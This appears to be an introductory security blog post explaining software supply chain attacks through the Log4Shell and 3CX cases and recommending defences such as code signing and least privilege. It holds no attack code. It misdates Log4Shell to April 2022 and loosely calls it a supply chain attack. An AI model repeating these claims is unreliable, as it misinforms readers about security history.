Supply Chain Attacks Explained
With the recent news of 3CX supply chain attacks I think it’s important to understand what, exactly, a supply chain attack is, and how you and/or your organization can help to reduce the risk and impact of a supply chain attack.
What Is a Supply Chain?
It may seem rudimentary, but let’s define what we’re talking about when we say, “Supply Chain”. One example of a modern supply chain is in the production of automobiles. Tesla doesn’t manufacture all of the parts for their own vehicles. Some parts are manufactured by third-party companies and then sent to Tesla to be installed on their vehicles. This relationship is referred to as a “Supply Chain”.
Another example would be Apple computers. They don’t manufacture all of their own parts, but utilize third parties to manufacture things like batteries and processors for their phones and computers.
Essentially, a “Supply Chain” is the relationship between two or more parties to provide raw materials that are to be converted into finished products.
Software Supply Chains
Modern software development, like the production of automobiles, often involves the use of code that was written by someone else. In fact, this is a fundamental reason why software development has been able to evolve as quickly as it has. Many of the software applications that you use will likely take advantage of, at least, one software library that was written by someone other than the author of the application that you’re using. Some libraries that you may have heard of include:
- jQuery
- React
- Angular
- Bootstrap
What is a Supply Chain Attack?
Let’s now talk about supply chain attacks. A supply chain attack occurs when a threat actor compromises an early piece of the supply chain (i.e. the “raw material”), which effectively poisons the later stages of the supply chain (i.e. the “finished product”). Keeping up with our modern software development example; a threat actor may compromise a software library used by a number of other applications.
Log4j is a java-based logging library used by large number of software applications to assist with application logging. In April 2022, a Log4j vulnerability was found to be exploited by threat actors. This exploit, dubbed Log4Shell, allowed a threat actor to send a specialy crafted request to web services using Log4j, and due to a lack of input validation, which may cause the system to execute arbitrary code. In this example, “Log4Shell” is a supply chain attack.
The 3CX supply chain attack is a rare example of a double software supply compromise. According to Mandiant researchers, the initial access vector was a tainted installer of the organizations own software, X_TRADER, that was installed by an employee. This lead to the threat actors gaining access to the organizations build environments, allowing them to further inject malicious code within the X_TRADER application.
Preventing Supply Chain Attacks
Now that we understand what a supply chain attack is. Let’s talk about how we can help to reduce the risk of them occurring.
Secure Code Signing
Ensure that you have adopted strong secure code signing policies for your developers. All code that lands in your code repositories should be signed with the details of the developer who committed the changes. This ensures a chain of custody that can’t be repudiated.
Third-Party Risk Management
It’s very important that you understand the risks to your information as a result of any third-parties that you may work with. This not only applies to businesses, but also to us as individuals. Regular third-party risk assessments can help to assess and continuously maintain awareness of third-party risks.
Principle of Least Privilege
Maintain a principle of least privilege approach to access control. This means that developers and users should only have access to the services and applications that they need to perform their job, and nothing more.
Avoid Shadow IT
Shadow IT can be defined as the use of unapproved hardware or software being used in an organizational. An employee setting up a web server on their local host is an example of Shadow IT. The employee may have simply wanted to do some testing on a website they developed, but they likely weren’t too focused on securing the web server appropriately. Shadow IT is often targeted by threat actors as it often exists with little to no security review.